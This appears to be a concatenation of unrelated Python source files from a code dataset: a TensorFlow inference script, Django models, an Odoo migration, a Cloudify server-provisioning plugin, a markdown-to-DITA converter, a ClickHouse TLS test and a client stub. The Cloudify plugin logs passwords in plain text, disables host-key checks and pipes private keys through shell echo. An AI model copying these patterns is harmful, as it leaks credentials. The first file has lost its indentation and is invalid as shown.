# To narrow computation to a subset of data for quick testing:
#X, y = X[1990:2010,:], y[1990:2010,:]
if option==2 or option==3:
dataset = tf.data.Dataset.from_tensor_slices(X)
else:
dataset = tf.data.Dataset.from_tensor_slices(X).batch(X.shape[0])
#dataset = tf.data.Dataset.from_tensor_slices(X).batch(64) # this is about the same speed as .batch(X.shape[0])
#dataset = tf.data.Dataset.from_tensor_slices(X).batch(1) # this also works but it is 1.5x-4x slower
# It also works with tf.keras.initializers.Constant() in place of tf.constant_initializer because these are only aliases: https://www.tensorflow.org/api_docs/python/tf/constant_initializer .
if option==0:
model = tf.keras.Sequential()
model.add(tf.keras.layers.Dense(Theta1.shape[0], activation='sigmoid', use_bias=True, kernel_initializer=tf.constant_initializer(Theta1[:,1:].T), bias_initializer=tf.constant_initializer(Theta1[:,0]), input_shape=[X.shape[1]]))
model.add(tf.keras.layers.Dense(Theta2.shape[0], activation='sigmoid', use_bias=True, kernel_initializer=tf.constant_initializer(Theta2[:,1:].T), bias_initializer=tf.constant_initializer(Theta2[:,0]))) # One doesn't even need the second sigmoid activation function because it is monotone increasing and doesn't change the ordering for argmax.
pred = model.predict(dataset)
elif option==1:
# input_shape=[X.shape[1]] could be left out below
layers = [tf.keras.layers.Dense(Theta1.shape[0], kernel_initializer=tf.constant_initializer(Theta1[:,1:].T), bias_initializer=tf.constant_initializer(Theta1[:,0]), activation='sigmoid', input_shape=[X.shape[1]]),
tf.keras.layers.Dense(Theta2.shape[0], kernel_initializer=tf.constant_initializer(Theta2[:,1:].T), bias_initializer=tf.constant_initializer(Theta2[:,0]), activation='sigmoid')] # One doesn't even need the second sigmoid activation function because it is monotone increasing and doesn't change the ordering for argmax.
# This doesn't work as tf.constant_initializer() doesn't take Tensors as input.
#layers = [tf.keras.layers.Dense(Theta1.shape[0], kernel_initializer= tf.constant_initializer(tf.transpose(Theta1[:,1:])), bias_initializer=tf.constant_initializer(Theta1[:,0]), activation='sigmoid'),
# tf.keras.layers.Dense(Theta2.shape[0], kernel_initializer= tf.constant_initializer(tf.transpose(Theta2[:,1:])), bias_initializer=tf.constant_initializer(Theta2[:,0]), activation='sigmoid')]
# This doesn't work: ValueError: Could not interpret initializer identifier: tf.Tensor(...)
#layers = [tf.keras.layers.Dense(Theta1.shape[0], kernel_initializer=tf.transpose(Theta1[:,1:]), bias_initializer=Theta1[:,0], activation='sigmoid'),
# tf.keras.layers.Dense(Theta2.shape[0], kernel_initializer=tf.transpose(Theta2[:,1:]), bias_initializer=Theta2[:,0], activation='sigmoid')]
model = tf.keras.Sequential(layers)
#model = tf.keras.models.Sequential(layers) # This is just an alias of previous.
#model.build() # not necessary
pred = model.predict(dataset)
elif option==6:
class NNModel(tf.keras.Model):
def __init__(self, Theta1, Theta2):
super(NNModel, self).__init__(name='neural_network_model')
self.dense_1 = tf.keras.layers.Dense(Theta1.shape[0], kernel_initializer=tf.constant_initializer(Theta1[:,1:].T), bias_initializer=tf.constant_initializer(Theta1[:,0]), activation='sigmoid', input_shape=[X.shape[1]])
self.dense_2 = tf.keras.layers.Dense(Theta2.shape[0], kernel_initializer=tf.constant_initializer(Theta2[:,1:].T), bias_initializer=tf.constant_initializer(Theta2[:,0]), activation='sigmoid')
def call(self, inputs):
# Define your forward pass here,
# using layers you previously defined (in `__init__`).
x = self.dense_1(inputs)
return self.dense_2(x)
model = NNModel(Theta1, Theta2)
pred = model.predict(dataset)
elif option in [2, 3, 4, 5]:
@tf.function
def evaluation(Theta1, Theta2, data):
# inside a @tf.function, I think all variables should be tf types, https://github.com/tensorflow/community/blob/master/rfcs/20180918-functions-not-sessions-20.md
# https://www.tensorflow.org/guide/effective_tf2#use_keras_layers_and_models_to_manage_variables
l1 = tf.sigmoid(tf.matmul(data, Theta1[1:,:]) + Theta1[0,:])
l2 = tf.sigmoid(tf.matmul(l1, Theta2[1:,:]) + Theta2[0,:])
#l2 = tf.matmul(l1, Theta2[1:,:]) + Theta2[0,:] # One doesn't even need the last sigmoid function because it is monotone increasing and doesn't change the ordering for argmax.
return l2
if option==2:
pred = []
for entry in dataset:
#pred.append(evaluation(tf.constant(Theta1.T), tf.constant(Theta2.T), entry.numpy().reshape((1,-1)))) # numpy reshape might be faster than tf.reshape
pred.append(evaluation(tf.constant(Theta1.T), tf.constant(Theta2.T), tf.reshape(entry, (1,-1)))) # doing it in TF
#pred = np.concatenate(pred, axis=0) # this also works
pred = tf.concat(pred, axis=0)
elif option==3:
pred = dataset.map(lambda x: evaluation(tf.constant(Theta1.T), tf.constant(Theta2.T), tf.reshape(x, [1,-1])))
#pred = dataset.map(lambda x: evaluation(tf.constant(Theta1.T), tf.constant(Theta2.T), x)) # This doesn't work.
pred = tf.concat([entry for entry in pred], axis=0)
elif option==4:
pred = []
for batch in dataset:
for entry in batch:
pred.append(evaluation(tf.constant(Theta1.T), tf.constant(Theta2.T), tf.reshape(entry, (1,-1))))
pred = tf.concat(pred, axis=0)
else: # option==5
pred = dataset.map(lambda x: evaluation(tf.constant(Theta1.T), tf.constant(Theta2.T), x))
#pred = dataset.map(lambda x: evaluation(tf.constant(Theta1.T), tf.constant(Theta2.T), tf.reshape(x, [-1,400]))) # This works, in same time.
pred = tf.concat([entry for entry in pred], axis=0)
else: # option==7
@tf.function
def evaluation2(Theta1k, Theta1b, Theta2k, Theta2b, data):
# inside a @tf.function, I think all variables should be tf types, https://github.com/tensorflow/community/blob/master/rfcs/20180918-functions-not-sessions-20.md
l1 = tf.sigmoid(tf.matmul(data, Theta1k) + Theta1b)
l2 = tf.sigmoid(tf.matmul(l1, Theta2k) + Theta2b)
#l2 = tf.matmul(l1, Theta2k) + Theta2b # One doesn't even need the last sigmoid function because it is monotone increasing and doesn't change the ordering for argmax.
return l2
pred = dataset.map(lambda x: evaluation2(tf.constant(Theta1[:,1:].T), tf.constant(Theta1[:,0]), tf.constant(Theta2[:,1:].T), tf.constant(Theta2[:,0].T), x))
#pred = dataset.map(lambda x: evaluation2(tf.constant(Theta1[:,1:].T), tf.constant(Theta1[:,0]), tf.constant(Theta2[:,1:].T), tf.constant(Theta2[:,0].T), tf.reshape(x, [-1,400]))) # This works, in same time.
pred = tf.concat([entry for entry in pred], axis=0)
# It does not work in this simplest form:
#pred = evaluation2(tf.constant(Theta1[:,1:].T), tf.constant(Theta1[:,0]), tf.constant(Theta2[:,1:].T), tf.constant(Theta2[:,0].T), dataset)
#tf.print(pred)
# The output layer (pred) has 10 units, for digits 1,2,...,9,0. After taking argmax, you have to map the result of argmax, 0,1,2,...,9 to the required 1,2,...,9,0.
pred_digit = (tf.argmax(pred, axis=1) + 1) % 10
#pred_digit = tf.map_fn(lambda x: (tf.argmax(x, axis=0, output_type=tf.int32)+1) % 10, pred, dtype=tf.int32) # This is rather slow!
pred_np = pred_digit.numpy().reshape(-1,1)
print('\nTraining Set Accuracy: {0:.2f}%.'.format(np.mean(pred_np == y) * 100))
print('Expected accuracy on complete Training Set (approx.): 97.5%.')
print('\nTime elapsed: {:.2f} sec'.format(time.time() - start_time))
print()
if option in [0, 1, 6]:
tf.print(model.summary()) # This provides interesting output.
plt.scatter(np.arange(len(y)), y, label='Ground truth')
plt.scatter(np.arange(len(y)), pred_np, marker=".", c='r', label='Prediction')
plt.xlabel('Sample ID')
plt.ylabel('Digit')
plt.legend()
plt.show()
| 3.09375 | 3 |
instagram/models.py | kilonzijnr/instagram-clone | 0 | 10825 | <gh_stars>0
from django.db import models
from django.db.models.deletion import CASCADE
from django.contrib.auth.models import User
from cloudinary.models import CloudinaryField
# Create your models here.
class Profile(models.Model):
"""Model for handling User Profile"""
user = models.OneToOneField(User, on_delete= models.CASCADE)
username = models.CharField(max_length = 25)
signup_date = models.DateTimeField(auto_now_add= True)
profile_photo = CloudinaryField('images')
followers = models.ManyToManyField(User, related_name='followers', blank= True)
bio = models.CharField(max_length= 70)
    def __str__(self):
        return self.username
def total_followers(self):
"""Method to return total numberof followers"""
return self.followers.count()
def save_profile(self):
"""Method to save profile to the database"""
self.save()
def delete_profile(self):
"""Method to delete profile from the database"""
self.delete()
    def update_profile(self,new):
        """Method to update this profile from another Profile instance
        Args:
            new(Profile): profile carrying the new username, bio and photo
        """
        self.username = new.username
        self.bio = new.bio
        self.profile_photo = new.profile_photo
        self.save()
@classmethod
def get_following(cls,user):
"""Method to return all users a specific user is following """
following = user.followers.all()
users = []
for profile in following:
user = User.objects.get(profile = profile)
users.append(user)
return users
@classmethod
def search_profile(cls,search_term):
"""Method to return profiles with a provided search term"""
        profiles = cls.objects.filter(username__icontains = search_term)
return profiles
class Likes(models.Model):
"""Model for handling Image likes"""
likes = models.IntegerField(default=0)
class Image(models.Model):
"""Model for handling Image posts by users"""
user = models.ForeignKey(User,on_delete= models.CASCADE)
image = CloudinaryField('images')
image_name = models.CharField(max_length= 25)
caption = models.CharField(max_length= 100)
profile = models.ForeignKey(Profile, on_delete=models.CASCADE, default= None)
likes = models.ForeignKey(Likes, on_delete=CASCADE, default=None)
comment = models.CharField(max_length= 120)
time_posted = models.DateTimeField(auto_now_add= True)
    def __str__(self):
        return self.image_name
def save_image(self):
"""Method to save Image to Database"""
self.save()
def delete_image(self):
"""Method to delete Image """
self.delete()
def like_image(self,user):
"""Method to add user as an image liker"""
self.likes.add(user)
def get_total_likes(self):
"""Method to get the total number of likess on an Image"""
return self.likes.count()
def update_caption(self,caption):
"""Method to updat eimage captions in database"""
self.caption = caption
self.save()
@classmethod
def get_images(cls,users):
"""Method to get a specific image"""
posts = []
for user in users:
images = Image.objects.filter(user = user)
for image in images:
posts.append(image)
return posts
def get_comments(self):
"""Method to get all comments related to a post"""
comments = Comments.objects.filter(image = self)
return comments
class Comments(models.Model):
"""Method to define attributes of a comment"""
user = models.ForeignKey(User, on_delete=models.CASCADE)
image = models.ForeignKey(Image,on_delete=models.CASCADE)
comment = models.TextField()
def __str__(self):
return self.comment
| 2.578125 | 3 |
addons/purchase_request/migrations/13.0.4.0.0/post-migration.py | jerryxu4j/odoo-docker-build | 0 | 10826 | <filename>addons/purchase_request/migrations/13.0.4.0.0/post-migration.py
from odoo import SUPERUSER_ID, api
from odoo.tools.sql import column_exists
def migrate(cr, version=None):
env = api.Environment(cr, SUPERUSER_ID, {})
if column_exists(cr, "product_template", "purchase_request"):
_migrate_purchase_request_to_property(env)
def _migrate_purchase_request_to_property(env):
"""Create properties for all products with the flag set on all companies"""
env.cr.execute("select id, coalesce(purchase_request, False) from product_template")
values = dict(env.cr.fetchall())
for company in env["res.company"].with_context(active_test=False).search([]):
env["ir.property"].with_context(force_company=company.id).set_multi(
"purchase_request", "product.template", values, False,
)
env.cr.execute("alter table product_template drop column purchase_request")
| 2 | 2 |
cfy/server.py | buhanec/cloudify-flexiant-plugin | 0 | 10827 | # coding=UTF-8
"""Server stuff."""
from __future__ import print_function
from cfy import (create_server,
create_ssh_key,
attach_ssh_key,
wait_for_state,
wait_for_cond,
create_nic,
attach_nic,
get_resource,
get_server_status,
start_server,
stop_server,
delete_resource)
import socket
import errno
from cloudify import ctx
from cloudify.decorators import operation
from cloudify.exceptions import NonRecoverableError
from cfy.helpers import (with_fco_api, with_exceptions_handled)
from resttypes import enums, cobjects
from paramiko import SSHClient, AutoAddPolicy
import spur
import spur.ssh
from time import sleep
from subprocess import call
from fabric.api import settings, run
import os
RT = enums.ResourceType
PROP_RESOURCE_ID = 'resource_id'
PROP_USE_EXISTING = 'use_existing'
PROP_IMAGE = 'image'
PROP_VDC = 'vdc'
PROP_NET = 'network'
PROP_SERVER_PO = 'server_type'
PROP_CPU_COUNT = 'cpu_count'
PROP_RAM_AMOUNT = 'ram_amount'
PROP_MANAGER_KEY = 'manager_key'
PROP_PRIVATE_KEYS = 'private_keys'
PROP_PUBLIC_KEYS = 'public_keys'
RPROP_UUID = 'uuid'
RPROP_DISKS = 'disks'
RPROP_NIC = 'nic'
RPROP_NICS = 'nics'
RPROP_IP = 'ip'
RPROP_USER = 'username'
RPROP_PASS = 'password'
@operation
@with_fco_api
@with_exceptions_handled
def create(fco_api, *args, **kwargs):
ctx.logger.info('starting server creation')
# Ease of access
_rp = ctx.instance.runtime_properties
_np = ctx.node.properties
# Check if existing server is to be used
if _np[PROP_USE_EXISTING]:
        server = get_resource(fco_api, _np[PROP_RESOURCE_ID], RT.SERVER)
if not server.nics:
raise Exception('No NICs attached to server')
_rp[RPROP_UUID] = server.resourceUUID
_rp[RPROP_DISKS] = [d.resourceUUID for d in server.disks]
_rp[RPROP_NIC] = server.nics[0].resourceUUID
_rp[RPROP_NICS] = [n.resourceUUID for n in server.nics]
_rp[RPROP_IP] = server.nics[0].ipAddresses[0].ipAddress
_rp[RPROP_USER] = server.initialUser
_rp[RPROP_PASS] = server.initialPassword
return (_rp[RPROP_UUID], _rp[RPROP_IP], _rp[RPROP_USER],
_rp[RPROP_PASS])
# Get configuration
image = get_resource(fco_api, _np[PROP_IMAGE], RT.IMAGE)
    if _np[PROP_VDC]:
vdc = get_resource(fco_api, _np[PROP_VDC], RT.VDC)
else:
vdc = None
network = get_resource(fco_api, _np[PROP_NET], RT.NETWORK)
server_po = get_resource(fco_api, _np[PROP_SERVER_PO], RT.PRODUCTOFFER)
manager_key = get_resource(fco_api, _np[PROP_MANAGER_KEY], RT.SSHKEY)
cpu_count = _np[PROP_CPU_COUNT]
ram_amount = _np[PROP_RAM_AMOUNT]
public_keys = _np[PROP_PUBLIC_KEYS] or []
private_keys = _np[PROP_PRIVATE_KEYS] or []
# Verify existence of private keys
missing_keys = set()
bad_permission_keys = set()
key_contents = {}
for key in private_keys:
try:
key_contents[key] = ctx.get_resource(os.path.expanduser(key))
except NonRecoverableError as e:
if 'HttpException: 404' in str(e):
missing_keys.add(key)
elif 'HttpException: 403' in str(e):
bad_permission_keys.add(key)
else:
raise
if missing_keys or bad_permission_keys:
raise Exception('Missing private keys: {}\nBad permission keys: {}'
.format(missing_keys, bad_permission_keys))
# Generate missing configuration
image_uuid = image.resourceUUID
if vdc is not None:
cluster_uuid = vdc.clusterUUID
vdc_uuid = vdc.resourceUUID
else:
cluster_uuid = image.clusterUUID
vdc_uuid = image.vdcUUID
network_uuid = network.resourceUUID
network_type = network.networkType
server_po_uuid = server_po.resourceUUID
manager_key_uuid = manager_key.resourceUUID
# TODO: better way of determining suitable disk
boot_disk_po_uuid = get_resource(fco_api,
'{} GB Storage Disk'.format(image.size),
RT.PRODUCTOFFER).resourceUUID
ctx.logger.info('Configuration: \n'
'image_uuid: %s\n'
'cluster_uuid: %s\n'
'vdc_uuid: %s\n'
'network_uuid: %s\n'
'server_po_uuid: %s\n'
'manager_key_uuid: %s\n'
'boot_disk_po_uuid: %s',
image_uuid, cluster_uuid, vdc_uuid, network_uuid,
server_po_uuid, manager_key_uuid, boot_disk_po_uuid)
# Create server
server_name = '{}{}_{}'.format(ctx.bootstrap_context.resources_prefix,
ctx.deployment.id, ctx.instance.id)
try:
server_uuid = _rp[RPROP_UUID]
except KeyError:
# key_obj = get_resource(fco_api, key_uuid, RT.SSHKEY)
# keys = SSHKey.REQUIRED_ATTRIBS.copy()
# keys.add('resourceUUID')
# submit_key = {}
# for k in keys:
# try:
# submit_key[k] = getattr(manager_key, k)
# except AttributeError:
# submit_key[k] = None
server_uuid = create_server(fco_api, server_po_uuid, image_uuid,
cluster_uuid, vdc_uuid, cpu_count,
ram_amount, boot_disk_po_uuid,
[manager_key], server_name)
_rp[RPROP_UUID] = server_uuid
ctx.logger.info('server_uuid: %s', server_uuid)
server = get_resource(fco_api, server_uuid, RT.SERVER)
server_nics = [nic.resourceUUID for nic in server.nics]
server_keys = [key.resourceUUID for key in server.sshkeys]
# Wait for server to be active
if not wait_for_state(fco_api, server_uuid, enums.ResourceState.ACTIVE,
RT.SERVER):
raise Exception('Server failed to prepare in time!')
ctx.logger.info('Server ACTIVE')
# Add keys
new_keys = set()
for key in public_keys:
if key not in server_keys:
key_uuid = create_ssh_key(fco_api, key, server_name + ' Key')
attach_ssh_key(fco_api, server_uuid, key_uuid)
new_keys.add(key_uuid)
ctx.logger.info('Keys attached: %s', new_keys)
# Create NIC
try:
nic_uuid = _rp[RPROP_NIC]
except KeyError:
nic_uuid = create_nic(fco_api, cluster_uuid, network_type,
network_uuid, vdc_uuid, server_name + ' NIC')
if not wait_for_state(fco_api, nic_uuid, enums.ResourceState.ACTIVE,
RT.NIC):
raise Exception('NIC failed to create in time!')
_rp[RPROP_NIC] = nic_uuid
ctx.logger.info('nic_uuid: %s', nic_uuid)
# Stop server if started
if get_server_status(fco_api, server_uuid) != enums.ServerStatus.STOPPED:
if not stop_server(fco_api, server_uuid):
raise Exception('Stopping server failed to complete in time!')
ctx.logger.info('Server STOPPED')
# Attach NIC
if nic_uuid not in server_nics:
job_uuid = attach_nic(fco_api, server_uuid, nic_uuid, 1).resourceUUID
cond = cobjects.Job.status == enums.JobStatus.SUCCESSFUL
if not wait_for_cond(fco_api, job_uuid, cond, RT.JOB):
raise Exception('Attaching NIC failed to complete in time!')
ctx.logger.info('NICs attached')
else:
ctx.logger.info('NICs already attached')
# Start server if not started
if get_server_status(fco_api, server_uuid) == enums.ServerStatus.STOPPED:
if not start_server(fco_api, server_uuid):
raise Exception('Running server failed to complete in time!')
ctx.logger.info('Server RUNNING')
nic = get_resource(fco_api, nic_uuid, RT.NIC)
server_ip = nic.ipAddresses[0].ipAddress
server_port = 22
ctx.logger.info('Server READY')
username = server.initialUser
    password = server.initialPassword
ssh_attempts = -1
ssh_delay = 3
# Fabric test
while ssh_attempts:
ctx.logger.info('Attempting to SSH ({})'.format(ssh_attempts))
try:
            with settings(host_string=server_ip, user=username,
password=password, disable_known_hosts=True,
abort_exception=Exception):
run('mkdir ~/.ssh')
run('chmod 0700 ~/.ssh')
for key, key_content in key_contents.items():
remote = os.path.join('~', '.ssh', os.path.basename(key))
run('echo \'{}\' > {}'.format(key_content, remote))
run('chmod 0600 ' + remote)
ctx.logger.info('Done')
break
except Exception as e:
ctx.logger.info(e)
ssh_attempts -= 1
else:
raise Exception('Failed to provision keys in time')
# # Spur test
# while ssh_attempts:
# ctx.logger.info('Attempting to SSH ({})'.format(ssh_attempts))
# shell = spur.SshShell(
# hostname=server_ip,
# port=server_port,
# username=username,
# password=password,
# shell_type=spur.ssh.ShellTypes.minimal,
# missing_host_key=spur.ssh.MissingHostKey.accept
# )
# with shell:
# try:
# ctx.logger.info('Creating & chmoding .ssh')
# shell.run(['mkdir', '~/.ssh'])
# shell.run(['chmod', '0700', '~/.ssh'])
# for key, key_content in key_contents.items():
# ctx.logger.info('Adding private key: ' + remote)
# remote = os.path.join('~', '.ssh', os.path.basename(key))
# shell.run(['echo', "'{}'".format(key_content), '>',
# remote])
# shell.run(['chmod', '0600', remote])
# except spur.ssh.ConnectionError as e:
# if e.original_error[0] not in {errno.ECONNREFUSED,
# errno.EHOSTUNREACH}:
# raise
# sleep(ssh_delay)
# ssh_attempts -= 1
# else:
# raise Exception('Failed to provision keys in time')
# # Provision private keys
# ssh = SSHClient()
# call(['ssh-keygen', '-R', server_ip])
# ssh.set_missing_host_key_policy(AutoAddPolicy())
#
# while ssh_attempts:
# try:
# ctx.logger.info('Attempting to SSH ({})'.format(ssh_attempts))
# ctx.logger.info('SSH Connection details: {}'.format(
# ((server_ip, server_port, username, password, ssh_delay))))
# ssh.connect(server_ip, server_port, username, password,
# timeout=ssh_delay, look_for_keys=False)
# ctx.logger.info('SSH connection established')
# break
# except socket.timeout:
# ssh_attempts -= 1
# except socket.error as e:
# if e[0] not in {errno.ECONNREFUSED, errno.EHOSTUNREACH}:
# ctx.logger.info('SSH connection failed: %s', e[0])
# raise
# sleep(ssh_delay)
# ssh_attempts -= 1
# else:
# raise Exception('Failed to provision keys in time')
# ssh.exec_command('mkdir ~/.ssh')
# ssh.exec_command('chmod 0700 ~/.ssh')
# for key, key_content in key_contents.items():
# remote = os.path.join('~', '.ssh', os.path.basename(key))
# ssh.exec_command('echo \'{}\' > {}'.format(key_content, remote))
# ssh.exec_command('chmod 0600 ' + remote)
_rp[RPROP_UUID] = server_uuid
_rp[RPROP_IP] = server_ip
_rp[RPROP_USER] = username
_rp[RPROP_PASS] = password
server = get_resource(fco_api, server_uuid, RT.SERVER)
_rp[RPROP_DISKS] = [d.resourceUUID for d in server.disks]
_rp[RPROP_NICS] = [n.resourceUUID for n in server.nics]
ctx.logger.info('Server IP: ' + server_ip)
ctx.logger.info('Server User: ' + username)
ctx.logger.info('Server Password: ' + password)
return server_uuid, server_ip, username, password
@operation
@with_fco_api
@with_exceptions_handled
def delete(fco_api, *args, **kwargs):
server_uuid = ctx.instance.runtime_properties.get(RPROP_UUID)
job_uuid = delete_resource(fco_api, server_uuid, RT.SERVER, True) \
.resourceUUID
cond = cobjects.Job.status == enums.JobStatus.SUCCESSFUL
if not wait_for_cond(fco_api, job_uuid, cond, RT.JOB):
raise Exception('Failed to delete server')
@operation
@with_fco_api
@with_exceptions_handled
def start(fco_api, *args, **kwargs):
server_uuid = ctx.instance.runtime_properties.get(RPROP_UUID)
if get_server_status(fco_api, server_uuid) != enums.ServerStatus.RUNNING:
if not start_server(fco_api, server_uuid):
raise Exception('Could not start server!')
@operation
@with_fco_api
@with_exceptions_handled
def stop(fco_api, *args, **kwargs):
server_uuid = ctx.instance.runtime_properties.get(RPROP_UUID)
if get_server_status(fco_api, server_uuid) != enums.ServerStatus.STOPPED:
if not stop_server(fco_api, server_uuid):
raise Exception('Could not stop server!')
@operation
@with_fco_api
@with_exceptions_handled
def creation_validation(fco_api, *args, **kwargs):
server_uuid = ctx.instance.runtime_properties.get(RPROP_UUID)
try:
get_resource(fco_api, server_uuid, RT.SERVER)
except Exception:
return False
return True
| 1.890625 | 2 |
markdown2dita.py | mattcarabine/markdown2dita | 6 | 10828 | # coding: utf-8
"""
markdown2dita
~~~~~~~~~~~~~
A markdown to dita-ot conversion tool written in pure python.
Uses mistune to parse the markdown.
"""
from __future__ import print_function
import argparse
import sys
import mistune
__version__ = '0.3'
__author__ = '<NAME> <<EMAIL>>'
__all__ = ['Renderer', 'Markdown', 'markdown', 'escape']
class Renderer(mistune.Renderer):
def codespan(self, text):
return '<codeph>{0}</codeph>'.format(escape(text.rstrip()))
def link(self, link, title, content):
return '<xref href="{0}">{1}</xref>'.format(link, escape(content or title))
def block_code(self, code, language=None):
code = escape(code.rstrip('\n'))
if language:
return ('<codeblock outputclass="language-{0}">{1}</codeblock>'
.format(language, code))
else:
return '<codeblock>{0}</codeblock>'.format(code)
def block_quote(self, text):
return '<codeblock>{0}</codeblock>'.format(text)
def header(self, text, level, raw=None):
# Dita only supports one title per section
title_level = self.options.get('title_level', 2)
if level <= title_level:
return '</section><section><title>{0}</title>'.format(text)
else:
return '<p><b>{0}</b></p>'.format(text)
def double_emphasis(self, text):
return '<b>{0}</b>'.format(text)
def emphasis(self, text):
return '<i>{0}</i>'.format(text)
def hrule(self):
# Dita has no horizontal rule, ignore it
# could maybe divide sections?
return ''
def inline_html(self, text):
# Dita does not support inline html, just pass it through
return text
def list_item(self, text):
return '<li>{0}</li>'.format(text)
def list(self, body, ordered=True):
if ordered:
return '<ol>{0}</ol>'.format(body)
else:
return '<ul>{0}</ul>'.format(body)
def image(self, src, title, text):
# Derived from the mistune library source code
src = mistune.escape_link(src)
text = escape(text, quote=True)
if title:
title = escape(title, quote=True)
output = ('<fig><title>{0}</title>\n'
'<image href="{1}" alt="{2}"/></fig>'
.format(title, src, text))
else:
output = '<image href="{0}" alt="{1}"/>'.format(src, text)
return output
def table(self, header, body, cols):
col_string = ['<colspec colname="col{0}"/>'.format(x+1)
for x in range(cols)]
output_str = ('<table>\n<tgroup cols="{0}">\n{1}\n'
.format(cols, '\n'.join(col_string)))
return (output_str + '<thead>\n' + header + '</thead>\n<tbody>\n' +
body + '</tbody>\n</tgroup>\n</table>')
def table_row(self, content):
return '<row>\n{0}</row>\n'.format(content)
def table_cell(self, content, **flags):
align = flags['align']
if align:
return '<entry align="{0}">{1}</entry>\n'.format(align, content)
else:
return '<entry>{0}</entry>\n'.format(content)
def autolink(self, link, is_email=False):
text = link = escape(link)
if is_email:
link = 'mailto:{0}'.format(link)
return '<xref href="{0}">{1}</xref>'.format(link, text)
def footnote_ref(self, key, index):
return ''
def footnote_item(self, key, text):
return ''
def footnotes(self, text):
return ''
def strikethrough(self, text):
return text
class Markdown(mistune.Markdown):
def __init__(self, renderer=None, inline=None, block=None, **kwargs):
if not renderer:
renderer = Renderer(**kwargs)
else:
kwargs.update(renderer.options)
super(Markdown, self).__init__(
renderer=renderer, inline=inline, block=block)
def parse(self, text, page_id='enter-id-here',
title='Enter the page title here'):
output = super(Markdown, self).parse(text)
if output.startswith('</section>'):
            output = output[len('</section>'):]
else:
output = '<section>\n' + output
output = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE concept PUBLIC "-//OASIS//DTD DITA Concept//EN" "concept.dtd">
<concept xml:lang="en-us" id="{0}">
<title>{1}</title>
<shortdesc>Enter the short description for this page here</shortdesc>
<conbody>
{2}</section>
</conbody>
</concept>""".format(page_id, title, output)
return output
def output_table(self):
# Derived from the mistune library source code
aligns = self.token['align']
aligns_length = len(aligns)
cell = self.renderer.placeholder()
# header part
header = self.renderer.placeholder()
cols = len(self.token['header'])
for i, value in enumerate(self.token['header']):
align = aligns[i] if i < aligns_length else None
flags = {'header': True, 'align': align}
cell += self.renderer.table_cell(self.inline(value), **flags)
header += self.renderer.table_row(cell)
# body part
body = self.renderer.placeholder()
for i, row in enumerate(self.token['cells']):
cell = self.renderer.placeholder()
for j, value in enumerate(row):
align = aligns[j] if j < aligns_length else None
flags = {'header': False, 'align': align}
cell += self.renderer.table_cell(self.inline(value), **flags)
body += self.renderer.table_row(cell)
return self.renderer.table(header, body, cols)
def escape(text, quote=False, smart_amp=True):
return mistune.escape(text, quote=quote, smart_amp=smart_amp)
def _parse_args(args):
parser = argparse.ArgumentParser(description='markdown2dita - a markdown '
'to dita-ot CLI conversion tool.')
parser.add_argument('-i', '--input-file',
                        help='input markdown file to be converted. '
'If omitted, input is taken from stdin.')
parser.add_argument('-o', '--output-file',
                        help='output file for the converted dita content. '
'If omitted, output is sent to stdout.')
return parser.parse_args(args)
def markdown(text, escape=True, **kwargs):
return Markdown(escape=escape, **kwargs)(text)
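# A minimal usage sketch (editor's note, not part of the original module); the
# input string, page_id and title below are made-up values, and `parse` is the
# method defined above:
#
#     dita_xml = Markdown().parse('# Heading\n\nSome *markdown* text.',
#                                 page_id='example-id', title='Example title')
#     print(dita_xml)
#
# The same conversion is available from the command line through main() below:
#
#     python markdown2dita.py -i input.md -o output.dita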
def main():
parsed_args = _parse_args(sys.argv[1:])
if parsed_args.input_file:
input_str = open(parsed_args.input_file, 'r').read()
elif not sys.stdin.isatty():
input_str = ''.join(line for line in sys.stdin)
else:
print('No input file specified and unable to read input on stdin.\n'
"Use the '-h' or '--help' flag to see usage information",
file=sys.stderr)
exit(1)
markdown = Markdown()
dita_output = markdown(input_str)
if parsed_args.output_file:
with open(parsed_args.output_file, 'w') as output_file:
output_file.write(dita_output)
else:
print(dita_output)
if __name__ == '__main__':
main()
| 2.96875 | 3 |
tests/integration/test_reload_certificate/test.py | roanhe-ts/ClickHouse | 1 | 10829 | <gh_stars>1-10
import pytest
import os
from helpers.cluster import ClickHouseCluster
SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))
cluster = ClickHouseCluster(__file__)
node = cluster.add_instance('node', main_configs=["configs/first.crt", "configs/first.key",
"configs/second.crt", "configs/second.key",
"configs/cert.xml"])
@pytest.fixture(scope="module", autouse=True)
def started_cluster():
try:
cluster.start()
yield cluster
finally:
cluster.shutdown()
def change_config_to_key(name):
'''
* Generate config with certificate/key name from args.
* Reload config.
'''
node.exec_in_container(["bash", "-c" , """cat > /etc/clickhouse-server/config.d/cert.xml << EOF
<?xml version="1.0"?>
<clickhouse>
<https_port>8443</https_port>
<openSSL>
<server>
<certificateFile>/etc/clickhouse-server/config.d/{cur_name}.crt</certificateFile>
<privateKeyFile>/etc/clickhouse-server/config.d/{cur_name}.key</privateKeyFile>
<loadDefaultCAFile>true</loadDefaultCAFile>
<cacheSessions>true</cacheSessions>
<disableProtocols>sslv2,sslv3</disableProtocols>
<preferServerCiphers>true</preferServerCiphers>
</server>
</openSSL>
</clickhouse>
EOF""".format(cur_name=name)])
node.query("SYSTEM RELOAD CONFIG")
def test_first_than_second_cert():
    ''' Successively set the first key and check that only it is accepted, then repeat for the second key. '''
# Set first key
change_config_to_key('first')
# Command with correct certificate
assert node.exec_in_container(['curl', '--silent', '--cacert', '/etc/clickhouse-server/config.d/{cur_name}.crt'.format(cur_name='first'),
'https://localhost:8443/']) == 'Ok.\n'
    # Command with wrong certificate
    # This command doesn't use the '-k' option, so it fails during execution.
    # That's why the except branch always runs.
try:
node.exec_in_container(['curl', '--silent', '--cacert', '/etc/clickhouse-server/config.d/{cur_name}.crt'.format(cur_name='second'),
'https://localhost:8443/'])
assert False
except:
assert True
# Change to other key
change_config_to_key('second')
# Command with correct certificate
assert node.exec_in_container(['curl', '--silent', '--cacert', '/etc/clickhouse-server/config.d/{cur_name}.crt'.format(cur_name='second'),
'https://localhost:8443/']) == 'Ok.\n'
# Command with wrong certificate
# Same as previous
try:
node.exec_in_container(['curl', '--silent', '--cacert', '/etc/clickhouse-server/config.d/{cur_name}.crt'.format(cur_name='first'),
'https://localhost:8443/'])
assert False
except:
assert True
| 2.109375 | 2 |
examples/python/fling.py | arminfriedl/fling | 0 | 10830 | <filename>examples/python/fling.py
import flingclient as fc
from flingclient.rest import ApiException
from datetime import datetime
# By default the dockerized fling service runs on localhost:3000. In case you
# run your own instance, change the base URL.
configuration = fc.Configuration(host="http://localhost:3000")
